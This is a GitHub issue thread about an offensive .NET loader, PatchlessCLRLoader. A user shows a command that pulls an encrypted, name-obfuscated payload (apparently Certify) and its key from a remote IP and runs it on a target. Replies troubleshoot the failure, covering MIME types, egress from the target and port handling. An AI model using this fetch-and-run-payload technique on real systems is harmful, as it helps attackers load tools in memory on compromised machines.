### ISSUE TITLE
Remote upload is not working

### ISSUE THREAD

**Issue by useragent23253** [VoldeSec/PatchlessCLRLoader#1]
Hello, I've got some errors while trying to upload it from my remote host

C:\Users\Administrator\Desktop>PatchlessCLRLoader.exe http://11.11.121.240:8888/C.e.r.t.i.f.y.enc http://11.11.121.240:8888/key.enc find
[+] Loading file http://11.11.121.240:8888/C.e.r.t.i.f.y.enc
[+] Loading key http://11.11.121.240:8888/key.enc
[+] Arguments: find
[-] Error sending request
[-] Failed to get payload from target

Any suggestions? Thanks in advanced

**Comment by D4rkGambit** [comment]
The load from URL function does work.  Make sure you are using HTTP not HTTPS (looks like you are) and make sure your web server is configured to support the .enc file mime type or your web server won’t provide the file.  You can test this by using a browser to go to the URL for the payload and see if you get an error.  A workaround is change the extension to .bin or an extension the web server already knows.  There is also the possibility of firewall or egress restrictions since you are pulling from an odd port.  Test that your target can egress out port 8888

**Comment by useragent23253** [comment]
I'm using simple python http server without iptables and etc. Server is available from web.

**Comment by VoldeSec** [comment]
Please try without any port number. Since the code only detect input "http" and "https" to determine using port 80 or 443.
In your case, use http://11.11.121.240/C.e.r.t.i.f.y.enc
